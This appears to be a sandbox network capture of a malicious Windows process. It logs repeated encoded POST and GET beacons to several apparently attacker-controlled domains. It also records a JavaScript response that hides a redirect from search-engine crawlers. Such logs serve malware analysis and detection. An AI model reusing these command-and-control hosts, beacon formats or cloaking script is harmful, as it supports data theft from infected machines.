                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 79 49 74 76 64 6c 59 6b 59 48 65 37 65 52 31 50 56 61 54 6d 78 2f 57 45 4f 58 7a 33 4d 4d 45 47 6f 59 57 64 50 64 58 42 61 46 7a 38 67 66 44 67 70 35 6b 5a 52 4e 6e 42 30 78 36 66 37 5a 54 58 59 4a 30 56 36 51 45 57 6c 74 49 56 36 37 69 39 64 7a 64 74 51 74 58 34 79 59 35 33 75 53 2f 71 50 4f 77 41 55 4f 31 54 44 77 4a 4e 30 41 6b 55 51 72 4f 57 6b 49 4f 6b 4a 54 34 51 54 6f 45 41 69 4f 51 6f 48 5a 4f 34 66 45 64 4f 62 4c 53 77 48 51 42 72 50 53 4c 2b 65 47 33 56 2b 4a 66 71 6e 68 63 6b 43 6b 6f 48 56 46 77 4e 5a 67 43 67 73 69 70 55 4a 76 67 4b 46 67 6e 44 44 32 43 4b 4f 5a 71 34 37 79 31 4d 51 76 70 6a 75 4e 62 69 52 53 31 77 79 58 76 4e 6f 31 30 53 32 65 77 54 64 4d 64 72 64 5a 38 56 42 6e 32 38 2f 59 4f 64 30 77 78 56 36 4a 71 5a 55 48 37 45 53 4c 58 6e 51 4b 64 4d 6c 74 47 5a 43 50 6a 63 35 62 59 68 33 61 50 35 6d 4e 31 77 2f 2f 54 6f 4b 77 50 2b 73 59 42 55 58 70 43 32 73 5a 65 59 61 6f 2f 70 72 38 49 4e 36 34 48 6c 50 6f 62 74 31 6f 78 [TRUNCATED]
                                                                 Data Ascii: i4fTbV=[TRUNCATED]
                                                                 Sep 22, 2024 17:44:09.519821882 CEST | 690 | IN | HTTP/1.1 405 Not Allowed
                                                                Date: Sun, 22 Sep 2024 15:44:09 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opOdraW5LOYQ3NHpUDHNro4LbHQixwcSxXkr4DPgWnPxWth80TmMbm0GPnLqAfh5GWitHcy8%2B0kHdIaZ77PVDbqln1Ak%2FtN1OoE1eQYZmeE1aCniafmzicjrYE2W9Aat"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c736a280981432b-EWR
                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                Session ID: 52 | Source IP: 192.168.2.6 | Source Port: 49777 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:11.090127945 CEST | Bytes transferred: 417 | Direction: OUT | Data:
                                                                GET /4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.cc101.pro
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Timestamp: Sep 22, 2024 17:44:13.085714102 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                                                                HTTP/1.1 200 OK
                                                                Date: Sun, 22 Sep 2024 15:44:13 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dH4sBb%2FAHaUEOfIV6Fyv7HelnnUk4uGyEHoNQ6AIosRL4yA%2FutTHT5%2FF9x8XOpE51JBRZolb8O47KO0AC2A%2F7Lv%2FPfQJJ8wKYQy16ubB2PP2WImsqGJ9lvvr4WExGjfW"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                Server: cloudflare
                                                                CF-RAY: 8c736a37cf847d18-EWR
                                                                Data Ascii: e6e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:
                                                                Timestamp: Sep 22, 2024 17:44:13.085736990 CEST | Bytes transferred: 1236 | Direction: IN | Data (continuation):
                                                                Data Ascii: 50%;"></canvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</
                                                                Timestamp: Sep 22, 2024 17:44:13.085755110 CEST | Bytes transferred: 1236 | Direction: IN | Data (continuation):
                                                                Data Ascii: save(); ctx.translate(ras, ras); ctx.beginPath(); ctx.lineWidth = ras * 0.08; ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI
                                                                Timestamp: Sep 22, 2024 17:44:13.085773945 CEST | Bytes transferred: 637 | Direction: IN | Data (continuation):
                                                                Data Ascii: } ; btn.style.background = '#36A11E' } else if (index > 60) { index += 1 } else {


                                                                Session ID: 53 | Source IP: 192.168.2.6 | Source Port: 49778 | Destination IP: 81.2.196.198 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:18.172374964 CEST | Bytes transferred: 695 | Direction: OUT | Data:
                                                                POST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=bkGuWEeCfnqbnK6hGh7lwvCfaY1802GtJWh1u6D/NQeWyHtKd8hm5WXYafOdnqlH50lgiS+jPVls/hKdzQckRq3uj+R8PaptgRV68R8JNYfUw03mt5+7Uwp0vSKz08XUzIDf9wkuo5M0Yb+l8azjJM5lLNDdUtfVMdWi97JX+bKeXew47r2igsvB/BvygxDVhmy4y8mwlDCg
                                                                Timestamp: Sep 22, 2024 17:44:18.834770918 CEST | Bytes transferred: 355 | Direction: IN | Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:18 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Ascii: [gzip-compressed response body, not printable]


                                                                Session ID: 54 | Source IP: 192.168.2.6 | Source Port: 49779 | Destination IP: 81.2.196.198 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:20.717183113 CEST | Bytes transferred: 719 | Direction: OUT | Data:
                                                                POST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=bkGuWEeCfnqbmpShKiTlyPCcEI189WGhJXd1u7GyKmGWxmdKc9hm8WXYS/Oc6alM504ViTCjPVhs/g6dwhcjR63s3OR+B6ptgRV68RojNYHUxFHmuY+4cQp3/iKzlMXQzIDx9xoAo7E0YZml9JrgQ85jWdDNadyqIungioZp+rijbIxinY2By8PD/D3AgRD/jmK4grqXq3nDzTzEULB2JuigUphurew1Rw==
                                                                Timestamp: Sep 22, 2024 17:44:21.376269102 CEST | Bytes transferred: 355 | Direction: IN | Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:21 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Ascii: [gzip-compressed response body, not printable]


                                                                Session ID: 55 | Source IP: 192.168.2.6 | Source Port: 49780 | Destination IP: 81.2.196.198 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:23.255611897 CEST | Bytes transferred: 1732 | Direction: OUT | Data:
                                                                POST /bf6k/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.asociacia.online
                                                                Origin: http://www.asociacia.online
                                                                Referer: http://www.asociacia.online/bf6k/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV= [TRUNCATED]
                                                                Timestamp: Sep 22, 2024 17:44:23.911545038 CEST | Bytes transferred: 355 | Direction: IN | Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Ascii: [gzip-compressed response body, not printable]


                                                                Session ID: 56 | Source IP: 192.168.2.6 | Source Port: 49781 | Destination IP: 81.2.196.198 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:25.798013926 CEST | Bytes transferred: 424 | Direction: OUT | Data:
                                                                GET /bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.asociacia.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Timestamp: Sep 22, 2024 17:44:26.464677095 CEST | Bytes transferred: 691 | Direction: IN | Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session ID: 57 | Source IP: 192.168.2.6 | Source Port: 49782 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:31.541647911 CEST | Bytes transferred: 683 | Direction: OUT | Data:
                                                                POST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=UbqQwi+lHla+sKbp8d4XMbjkNCQPy38tOMg9n/1WpAHHdNGUOLFmsd9lkkBtZLYrv8hbQRcPvL0YjG5FxPdTD/Em9upQztvxYjHzSFBKAY6BdzKhmJziowBRl6oJSbYLy8NqK91DLOu5w0HM4Yt6fPSOCtisHYnDkyep5Hnieq9B9yjdDBkVdwI0saNKkUu2ouQsLHeSFO0H
                                                                Timestamp: Sep 22, 2024 17:44:32.248075962 CEST | Bytes transferred: 402 | Direction: IN | Data:
                                                                HTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:32 GMT
                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session ID: 58 | Source IP: 192.168.2.6 | Source Port: 49783 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:34.086030006 CEST | Bytes transferred: 707 | Direction: OUT | Data:
                                                                POST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=UbqQwi+lHla++bLp++QXd7jnCiQPpH8pOMs9n9ZGp1vHcpCUPPRmvd9lsEBoEbYgv9dtQTIPvLwYjHJFxc1QCvEk1OpS3tvxYjHzSFlsAbKBcD6hntnhrwBOi6oJErY1y8NyK8ptLLi5w0XM7KF9K/SEcdjkXpGcuBis7lDnd5t18EiHfyk2Pgo2sYV4k0ucquosZQS1K6RkW1o8p4xbiTKAv/fKQMeKLg==
                                                                Timestamp: Sep 22, 2024 17:44:34.898056984 CEST | Bytes transferred: 402 | Direction: IN | Data:
                                                                HTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:34 GMT
                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session ID: 59 | Source IP: 192.168.2.6 | Source Port: 49784 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:36.628519058 CEST | Bytes transferred: 1720 | Direction: OUT | Data:
                                                                POST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 55 62 71 51 77 69 2b 6c 48 6c 61 2b 2b 62 4c 70 2b 2b 51 58 64 37 6a 6e 43 69 51 50 70 48 38 70 4f 4d 73 39 6e 39 5a 47 70 7a 33 48 64 61 4b 55 4f 6f 39 6d 75 64 39 6c 69 6b 42 70 45 62 59 48 76 38 30 6b 51 54 55 66 76 4a 59 59 67 6b 52 46 6d 39 31 51 4d 76 45 6b 71 2b 70 54 7a 74 76 6b 59 6e 6a 33 53 46 56 73 41 62 4b 42 63 42 53 68 69 4a 7a 68 6e 51 42 52 6c 36 70 62 53 62 5a 59 79 38 46 69 4b 38 74 54 4c 34 71 35 77 56 6e 4d 36 2f 78 39 49 66 53 43 64 64 69 69 58 70 4b 35 75 42 2f 56 37 68 4c 42 64 37 78 31 77 68 48 66 4d 7a 4e 6f 61 41 78 55 37 34 70 4a 69 45 32 72 6b 4e 73 32 5a 54 33 49 4d 34 68 74 56 56 67 56 6f 70 52 63 79 41 6d 57 33 75 65 56 61 76 6e 6b 5a 66 36 2b 67 51 4c 6f 72 5a 74 4d 45 45 30 35 6d 45 6a 77 36 6a 74 53 6f 62 58 41 6d 4e 68 43 49 79 67 64 69 30 63 52 43 79 50 30 47 52 4c 69 57 4b 6d 6c 61 6c 59 66 31 61 50 55 49 73 33 61 2f 42 47 5a 52 59 32 48 6b 79 73 61 37 6f 35 43 38 63 74 4e 76 46 71 74 39 6b 33 70 53 38 39 31 50 62 46 6c 7a 34 6c 35 4e 78 47 [TRUNCATED]
                                                                Data Ascii: i4fTbV=[TRUNCATED]
                                                                Timestamp: Sep 22, 2024 17:44:37.366883039 CEST  Bytes transferred: 402  Direction: IN  Data:
                                                                HTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:37 GMT
                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session ID: 60  Source IP: 192.168.2.6  Source Port: 49786  Destination IP: 142.250.185.115  Destination Port: 80  PID: 4508  Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp: Sep 22, 2024 17:44:39.174176931 CEST  Bytes transferred: 420  Direction: OUT  Data:
                                                                GET /1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.deefbank.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Timestamp: Sep 22, 2024 17:44:39.890641928 CEST  Bytes transferred: 557  Direction: IN  Data:
                                                                HTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:39 GMT
                                                                Location: https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU%3D&azq=fdKL
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session ID: 61  Source IP: 192.168.2.6  Source Port: 49787  Destination IP: 172.81.61.224  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:44:49.605087042 CEST  Bytes transferred: 423  Direction: OUT  Data:
                                                                GET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.moritynomxd.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Timestamp: Sep 22, 2024 17:44:50.204298019 CEST  Bytes transferred: 728  Direction: IN  Data:
                                                                HTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=utf-8
                                                                X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                                X-Ratelimit-Limit: 500
                                                                X-Ratelimit-Remaining: 499
                                                                X-Ratelimit-Reset: 1727023490
                                                                Date: Sun, 22 Sep 2024 15:44:50 GMT
                                                                Content-Length: 458
                                                                Connection: close
                                                                Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                Session ID: 62  Source IP: 192.168.2.6  Source Port: 49788  Destination IP: 81.2.196.19  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:44:55.243880033 CEST  Bytes transferred: 686  Direction: OUT  Data:
                                                                POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 42 45 6f 34 53 50 70 4f 44 4b 58 68 45 6e 68 4d 78 35 74 68 43 61 63 51 37 6e 2f 73 6a 44 55 30 2b 31 54 73 71 5a 51 73 35 71 6f 55
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
                                                                Timestamp: Sep 22, 2024 17:44:55.907061100 CEST  Bytes transferred: 355  Direction: IN  Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:55 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session ID: 63  Source IP: 192.168.2.6  Source Port: 49789  Destination IP: 81.2.196.19  Destination Port: 80
